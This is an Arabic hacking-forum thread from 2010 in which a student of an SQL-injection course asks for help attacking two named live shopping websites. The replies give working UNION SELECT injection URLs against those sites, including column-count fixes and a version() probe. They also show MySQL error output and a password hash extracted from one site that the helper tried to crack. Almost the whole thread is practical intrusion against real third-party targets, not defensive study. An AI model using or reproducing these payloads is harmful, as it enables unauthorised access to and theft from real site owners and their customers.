يمنع منعاً باتاً رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com
مطلوب طاقم إشراف وأدارة للمنتدى, للمعنيين بالرجاء التواصل مع الادارة على البريد التالي :
vbspiders.network@gmail.com


العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 10-01-2010, 04:32 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية newuser
 

 

 
إحصائية العضو





newuser غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
newuser is on a distinguished road

افتراضي مجاب: استفسار الدرس الرابع.


السلام عليكم.


شباب انا حملت الدروس.


ولاكن وصلت لمشكله .



احد المواقع لقيته مصاب بالـSQL وهذا الرابط

http://www.sharghishop.net/zcat.php?id=1


بعد اضافه ' يعطيك خطا يعني الموقع مصاب.



ولآكن عندما نضع رقم 6 هكذا
http://www.sharghishop.net/zcat.php?id=-1 union select 1,2,3,5,6--


يعطيك رابط صوره. والصوره مش باينه.





يعني الموقع حامي حالو.


______________________




ننتقل لموقع ثاني. وهذا الرابط
http://www.cdbaran.com/zcat.php?id=1


اذا اضفنا ' بيعطيك
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/sidimibare/domains/cdbaran.com/public_html/zcat.php on line 393

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/sidimibare/domains/cdbaran.com/public_html/zcat.php on line 394





يعني مش معقوله بكتب 300 سطر .


مثلا 1,2,3,4,5,6,7,8,9,10,11,12,13 صعبه تكتبها لتوصل لـ300




ماهو الحل.

___________


وهذا موقع اخر كل ما تضيف عمود بيعطيك نفس الرساله وهي

The used SELECT statements have a different number of columns



والرابط:
http://www.sharghishop.net/zcat.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29--



_________________




Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC hsjtshv hg]vs hgvhfu>

   

رد مع اقتباس
أفضل جواب - كتبه خالد سعودي
يعطيك العافيه خالد.



اي موقع انا حاط 3 روابط كل واحد غير عن الثاني



مع الشكر.


newuser


هلا فيك
بنسبة لي الموقع


هذا عندك عدد الاعمدة خطا

كود PHP:
http://www.cdbaran.com/zcat.php?id=-1 UNION SELECT 1,2,44444444444,5,6-- 
لي العمود لصحيح يحب عليه التغير في الرقم
كمل على الموقع تشوف في نصف الصفحة 44444444444
يحب عليك التركيز
في نهاية يطلع هذا
beb0f24b92d23784fd7b62d74bed47d8d0e345da85e64f77c 15b833901f14d65
انا حولت فك في MD5 ولكن ماضبط معي

يالله نكمل الموقع الثاني
كود PHP:
http://www.sharghishop.net/zcat.php?id=-1 union select 1,2,3,5,6-- 
عندك خطا في عدد الاعمده يكون عدد الاعمده 5
يصبح الرابط الصحيح كذا
كود PHP:
http://www.sharghishop.net/zcat.php?id=-1 union select 1,2,3,4,5-- 
بس هنا ابيك تركز معي في الصفحة ولارقام بقوم بتغيررقم 3 اوكي
يصبح كذا
كود PHP:
http://www.sharghishop.net/zcat.php?id=-1 union select 1,2,333333,5,6-- 
تفتح معاك الصفحة مافي اي مشكلة بس ابيك تروح لي نصف الصفحة عرض معلومات الصفحة شوف وركز رقم 3 تغير صح
فاهمت على
للتاكيد
اصدار القاعدة بدل في رقم 3
version()
هذا الرابط
كود PHP:
http://www.sharghishop.net/zcat.php?id=-1 union select 1,2,
version(),4,5-- 
اصدار القاعدة
5.0.51

ونهاية احب اشكر الله سبحانه وتعالي وشكر ادارة المنتدي وعلى دوراتهم الناحجة
ارجو التقييم
مع السلامة
موفق
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
الدرس الرابع (النماذج) SoLiTair4Ever برمجة الويب 2 11-06-2010 05:42 PM
تطبيق على الدرس الرابع من الدورة MasTer MiND Hackers Showoff 5 07-24-2009 12:26 AM
الدرس الرابع عشر(العمليات الرياضية) SoLiTair4Ever برمجة الويب 0 07-19-2009 11:29 PM


الساعة الآن 07:52 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0